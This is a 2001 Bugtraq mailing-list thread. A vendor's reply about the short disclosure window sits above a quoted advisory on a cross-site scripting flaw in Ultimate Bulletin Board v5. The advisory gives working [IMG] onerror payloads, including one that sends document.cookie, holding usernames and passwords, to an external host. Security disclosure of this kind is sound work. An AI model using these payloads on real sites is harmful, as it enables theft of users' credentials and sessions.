Re: Ultimate Bulletin Board

[Charles Capps <capps () SOLARECLIPSE NET>]

This issue has been resolved in version 5.47e, currently available in the
UBB Members Area at Infopop.com

Please note that Mister Ashman gave less than five hours between notifying
Infopop of the security issue and posting this issue to Bugtraq.  The fixed
version was released nearly at the same time as the post to Bugtraq.

Is it not customary to wait until the vendor has not only responded to the
issue, patched the software, and notified its customers before releasing
details concerning a possible exploit?

This arrangement is far superior to simply notifying the vendor and mailing
Bugtraq at the same time, as appears to have been done here.  It allows
possibly at-risk users to patch the problem before it is out in the wild.
--
Charles Capps





----- Original Message -----
From: "Scott Ashman" <sashman () JASPIN COM>
To: <BUGTRAQ () SECURITYFOCUS COM>
Sent: Wednesday, February 21, 2001 14:19
Subject: [BUGTRAQ] Ultimate Bulletin Board


Here is a message I just popped off to infopop about their Ultimate Bulletin
Board v5 product.  It's not really meant for someone not used to their
product.


----------------------------------------------------------------------------
----


If a user has info stored in a cookie, replies to a message and is using IE
4.0+  there is a way for a hacker to trap his IP / user name / password /
other cookie information and send them to an external source using your UBB
code with HTML *off*.  There is a way to do this by simply viewing a message
as well, although it's obvious something is going on as it involves a
redirection.  Here's how it works :

Apparently the [img][/img] tag allows non-spaced javascript to run.  You can
write a line like this :

[IMG]test"onerror="alert('test');[/IMG]

This will run the javascript alert when the image 'test' fails to load.

Your cookies can hold both the username and password but is only accessable
on
the
http://sitename/cgi-bin/ path.  Script running on anything in cgi-path
(replies) can access it.  So
[IMG]test"onerror="alert(document.cookie);[/IMG] will pop up an alert box
with the cookie info on a "reply" page as it's displayed in the thread
review
at the bottom.

You can reassign the src of your image (this.src) with document.cookie
tacked on
to point to an external page.  The weird thing about imgs and http requests
in general is that your destination does not have to be an image.  So <a
src="www.excite.com/index.html"> will actually try to access index.html.
Hence, you can add actual passable information to an external cgi or
whatever.  On the external page all you need to do is either watch the logs
or have the page itself
log any URL variables along with IPs coming in from the request.

The final line should read something like :
[IMG]test"onerror="this.src='http://xxx.xxx.com/page.cfm?'+escape(document.c
ookie);
[/IMG]

(Pasting this line [no spaces/crlf] in an mesage means that any user
replying to anything in that thread will cause their cookie to be sent to an
external source)

Scott Ashman
Jaspin Interactive www.jaspin.com